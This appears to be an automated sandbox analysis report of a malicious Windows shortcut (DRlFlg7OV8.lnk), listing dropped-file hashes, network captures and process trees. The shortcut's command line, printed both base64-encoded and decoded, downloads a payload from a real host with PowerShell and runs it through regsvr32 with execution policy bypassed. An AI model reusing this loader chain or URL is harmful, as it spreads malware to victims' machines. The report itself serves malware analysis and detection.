                                    MD5:9B7A689488D6E8D19AF149716C423227
                                    SHA1:7D691C54C09AE6BC11FE8427B0FCD8ECF4B43737
                                    SHA-256:1D9FA2999BFA189F7AFE2688C97EE173B1FF6CB78F92DA3018B1205D42DD0CFF
                                    SHA-512:F20717A24AE120241159E6788DAA217EB3F48050AB7F580C11A4493F25AF1E5B850FD88B7BD1C9EFD85CB9B26CBEC9D71F52804DCF48959AFAC35C3195C0729D
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08123128000202061
                                    Encrypted:false
                                    SSDEEP:3:UtGEYeyMWTMsjv/Ss/IGYZX/qzQzYE/lallSdLvl+/rS56/:UUEzPsYic0kAQN0e
                                    MD5:BEC063B02C07DB658EF05BDFA3BF92F7
                                    SHA1:AB2DDD8FEB39025FDF50FFC11DF1B32A71CFD643
                                    SHA-256:9DCE300D64045D43EE843A0399946CBCAC8A7834BFF3A2038FF575BA9544F57D
                                    SHA-512:C645ED13F90BF368CFBB5DD4C715F4B14B294EE70826661B35BACD8BEA65C9D619FC9B681FBFB239E5634456634ECB8881524248D876E9F0F4236E1BF33D73B9
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16856
                                    Entropy (8bit):5.466119866901382
                                    Encrypted:false
                                    SSDEEP:384:D8ijriQMuHVViWG7dGE6XNqaJrYHnXH4vh5hPsTqN08Twf2QoipbX/Y:4wrzMCG05XNqa1aXUPxe8GpbA
                                    MD5:669016570F38709C899A9C9DE01FF084
                                    SHA1:F96CF9DD02B76BF734EC5E2CED33C4DC1AD3ED52
                                    SHA-256:D5E2B6AE80F8C265F6DAB0F1AF3FE814AAA1852AF06F8DB67D3D9F21B93D5F66
                                    SHA-512:ACDDF198AE0A9A0906096FC2F7C087D53AE0E9CA78668EFFD2D848EEE04BC1EEE63013C1906FA5D9C4E995BE68D024037091B23C60EA6AABCAAA1FBBF2FBDD1D
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):334
                                    Entropy (8bit):3.7223387370453302
                                    Encrypted:false
                                    SSDEEP:6:Q7wNc2qGXlMbHuaY0JhdapkyAdJ+vKfkrgmwevAGTDYkWTAlANmwevAGTY:Q0N7XoO/6hdiOMK4F9vTYkLlF9vI
                                    MD5:6671AB6B83187365EFE60AFFB0A9E065
                                    SHA1:5628BE1C0E052BF9D8F453B9593A40596927E4F5
                                    SHA-256:747DBA489A369CBD5AE9D3A71C0D268006BC7EAF753E3ED7D41A60489DC7FDA0
                                    SHA-512:A98EEA254D3CD2291956C35CFE4280E39405C39658976A74834B29B3464722B9D52305751845FC44337827199B3630E6C7DED1ACF6BBF113A37C3F8EEEA9896E
                                    Malicious:true
Preview (UTF-16 text decoded):$ProgressPreference="SilentlyContinue";IWR http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ -OutFile $env:TEMP/znsrPecXVb.dMo;Regsvr32.exe $env:TEMP/znsrPecXVb.dMo
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4507
                                    Entropy (8bit):3.776060397369433
                                    Encrypted:false
                                    SSDEEP:48:HCyu57oRnty6YFzqbFNSogZoqHty6YFzq8WNSogZoPG1:HCyu5sDzYFWb+HBzYFWEHS4
                                    MD5:675CED33417DC1A94424BCF0DFD7565C
                                    SHA1:32B7E07AFA73E0C80ABD202C72875C6659984DEB
                                    SHA-256:6D2309DCCA129B4E0BC7ECF118C3C9263FBC052A5ED1A95146186A055E717A82
                                    SHA-512:4553CC265D3251A6D0B300A36289E0F45799C647B68FE461BD0A7FB58365B4AD3F97A6AECC13A62C982DAB85674C73DE677B08760981BA4E247F5DA96AC17A92
                                    Malicious:false
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=134, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                    Entropy (8bit):4.00318050714148
                                    TrID:
                                    • Windows Shortcut (20020/1) 100.00%
                                    File name:DRlFlg7OV8.lnk
                                    File size:2'399 bytes
                                    MD5:3952caf999263773be599357388159e0
                                    SHA1:76c39a3a4823beab79e497bfcdbc2367188d95c4
                                    SHA256:09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924
                                    SHA512:6a69d7872ba14c12a6a7a2735bbc33f52b8cb35fbec20e8a7530fce7cb9097fe25a99247c532912da470e19c1095582f023a31718415ea2c697f946d981cab10
                                    SSDEEP:24:8w+/BHYVKVWx+/CWTdzzEqXRIZJiXRF4ziVg0GnbI2HD2RGdNarab/8FC28P8kP4:8n5a8JdXjvg7nbI2qcdN4abG15R
                                    TLSH:70417E182AD50218EBE2EF317CF96641D8A7BD23E9318F4D008D864D6B13650ED61F3E
                                    File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                    Icon Hash:fc3cf4c4dcd9d9ed

                                    General

                                    Relative Path:..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Command Line Argument:-command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "%tmp%\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "%tmp%\gjRzEyUDTV.ps1"; Remove-Item "%tmp%\gjRzEyUDTV.ps1"
                                    Icon location:shell32.dll
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2025-01-02T10:04:37.521177+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.16 | 49706 | 166.62.28.147 | 80 | TCP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 2, 2025 10:04:36.233009100 CET | 49706 | 80 | 192.168.2.16 | 166.62.28.147
                                    Jan 2, 2025 10:04:36.237941980 CET | 80 | 49706 | 166.62.28.147 | 192.168.2.16
                                    Jan 2, 2025 10:04:36.238040924 CET | 49706 | 80 | 192.168.2.16 | 166.62.28.147
                                    Jan 2, 2025 10:04:36.239800930 CET | 49706 | 80 | 192.168.2.16 | 166.62.28.147
                                    Jan 2, 2025 10:04:36.244677067 CET | 80 | 49706 | 166.62.28.147 | 192.168.2.16
                                    Jan 2, 2025 10:04:37.520904064 CET | 80 | 49706 | 166.62.28.147 | 192.168.2.16
                                    Jan 2, 2025 10:04:37.520955086 CET | 80 | 49706 | 166.62.28.147 | 192.168.2.16
                                    Jan 2, 2025 10:04:37.521177053 CET | 49706 | 80 | 192.168.2.16 | 166.62.28.147
                                    Jan 2, 2025 10:04:38.178755999 CET | 49706 | 80 | 192.168.2.16 | 166.62.28.147
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 2, 2025 10:04:36.209846020 CET | 53731 | 53 | 192.168.2.16 | 1.1.1.1
                                    Jan 2, 2025 10:04:36.221688032 CET | 53 | 53731 | 1.1.1.1 | 192.168.2.16
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Jan 2, 2025 10:04:36.209846020 CET | 192.168.2.16 | 1.1.1.1 | 0x6f8a | Standard query (0) | focusmedica.in | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Jan 2, 2025 10:04:36.221688032 CET | 1.1.1.1 | 192.168.2.16 | 0x6f8a | No error (0) | focusmedica.in | (none) | 166.62.28.147 | A (IP address) | IN (0x0001) | false
                                    • focusmedica.in
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.16 | 49706 | 166.62.28.147 | 80 | 6440 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jan 2, 2025 10:04:36.239800930 CET | 186 | OUT | GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Host: focusmedica.in
                                    Connection: Keep-Alive
                                    Jan 2, 2025 10:04:37.520904064 CET | 507 | IN | HTTP/1.1 404 Not Found
                                    Date: Thu, 02 Jan 2025 09:04:36 GMT
                                    Server: Apache
                                    Content-Length: 315
                                    Keep-Alive: timeout=5
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                    Jan 2, 2025 10:04:37.520955086 CET | 507 | IN | HTTP/1.1 404 Not Found
                                    Date: Thu, 02 Jan 2025 09:04:36 GMT
                                    Server: Apache
                                    Content-Length: 315
                                    Keep-Alive: timeout=5
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

                                    Target ID:0
                                    Start time:04:04:29
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"
                                    Imagebase:0x7ff7582a0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:04:04:29
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6684c0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:04:04:32
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff62c440000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:04:04:33
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
                                    Imagebase:0x7ff7582a0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:04:04:37
                                    Start date:02/01/2025
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo
                                    Imagebase:0x7ff666310000
                                    File size:25'088 bytes
                                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    No disassembly